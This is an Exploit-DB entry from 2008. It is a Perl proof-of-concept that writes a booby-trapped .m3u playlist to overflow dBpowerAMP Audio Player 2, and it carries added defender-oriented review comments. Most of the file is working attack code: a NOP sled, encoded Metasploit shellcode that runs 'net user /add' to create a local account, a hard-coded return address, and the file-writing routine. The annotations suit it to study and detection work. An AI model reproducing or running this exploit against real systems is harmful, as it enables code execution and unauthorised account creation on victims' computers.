dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow

EDB-ID:

5069


Author:

securfrog

Type:

remote


Platform:

Windows

Date:

2008-02-06


####################################################################
#
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit
#
# Proof-of-concept generator: builds one over-long "http://" playlist
# entry and writes it to a .m3u file in the current directory. The script
# itself opens no network connection; per the title, the overflow is in
# the player's handling of the .m3u content.
#
# Bytes written, in order (264 in total, no line terminator):
#   "http://" (7) + 65 x 0x90 + 188-byte shellcode + 4-byte $eip
#
# Reviewer notes for defenders:
#   * File indicator: a playlist entry that starts with "http://" and is
#     followed directly by a run of 0x90 bytes and other non-printable
#     data is not a valid URL and can be matched on that structure.
#   * The technique relies on a fixed address and on executing bytes held
#     in the data buffer - the two assumptions that ASLR and DEP,
#     respectively, are designed to break.
#   * No "use strict" / "use warnings"; $nop, $eip and $payload are
#     package globals.
#
# Filler placed between the "http://" prefix and the shellcode.
$nop= "\x90" x 65;
#
# Generator comment as published:
#   win32_exec - CMD=cmd /k net user /add secur frog Size=188 (http://metasploit.com)
# The trailing "253" in the published comment equals 65 + 188, i.e. the
# number of bytes between the "http://" prefix and $eip.
#
# Effect, per that comment: runs "net user /add secur frog" under cmd.exe,
# i.e. an attempt to create a local account named "secur". Host-side
# indicators are therefore cmd.exe started by the player process and an
# unexpected local account of that name (account creation is audited as
# Security event 4720 on current Windows versions).
#
# NOTE(review): the first bytes look like an encoder stub (fnstenv-based
# get-PC followed by an XOR loop), so the command string is presumably
# not present in clear text in the file; match on structure, not on the
# string "net user".
my $shellcode =
"\x29\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c".
"\x91\xfa\x54\x83\xeb\xfc\xe2\xf4\x90\x79\xbe\x54\x6c\x91\x71\x11".
"\x50\x1a\x86\x51\x14\x90\x15\xdf\x23\x89\x71\x0b\x4c\x90\x11\x1d".
"\xe7\xa5\x71\x55\x82\xa0\x3a\xcd\xc0\x15\x3a\x20\x6b\x50\x30\x59".
"\x6d\x53\x11\xa0\x57\xc5\xde\x50\x19\x74\x71\x0b\x48\x90\x11\x32".
"\xe7\x9d\xb1\xdf\x33\x8d\xfb\xbf\xe7\x8d\x71\x55\x87\x18\xa6\x70".
"\x68\x52\xcb\x94\x08\x1a\xba\x64\xe9\x51\x82\x58\xe7\xd1\xf6\xdf".
"\x1c\x8d\x57\xdf\x04\x99\x11\x5d\xe7\x11\x4a\x54\x6c\x91\x71\x3c".
"\x50\xce\xcb\xa2\x0c\xc7\x73\xac\xef\x51\x81\x04\x04\x61\x70\x50".
"\x33\xf9\x62\xaa\xe6\x9f\xad\xab\x8b\xf2\x97\x30\x4c\xbe\x91\x74".
"\x02\xf4\x8e\x74\x19\xe2\x9f\x26\x4c\xbe\x9b\x30\x08\xb1\x89\x31".
"\x0f\xe4\x88\x74\x0a\xe3\x95\x33\x6c\x91\xfa\x54";
#
# Hard-coded 4-byte value appended last. Judging by the variable name it
# is the value meant to overwrite the saved return address; the page does
# not say which build or OS version the address was taken from.
$eip = "\xe0\xec\xb8\x00";
#
# Single playlist entry: URL scheme prefix, filler, shellcode, address.
$payload = "http://".$nop.$shellcode.$eip;
#
# Output file name; a fixed literal, created relative to the current
# working directory.
my $file="bob_marley_I_Shot_The_Sheriff.m3u";
#
# NOTE(review): two-argument open with the mode embedded in the string.
# That is tolerable here only because $file is a fixed literal; with a
# caller-supplied name the three-argument form is the safe idiom.
# ">>" appends, so an existing file of that name is extended, not replaced.
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
# The return values of print and close are not checked.
print $FILE $payload;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";

# milw0rm.com [2008-02-06]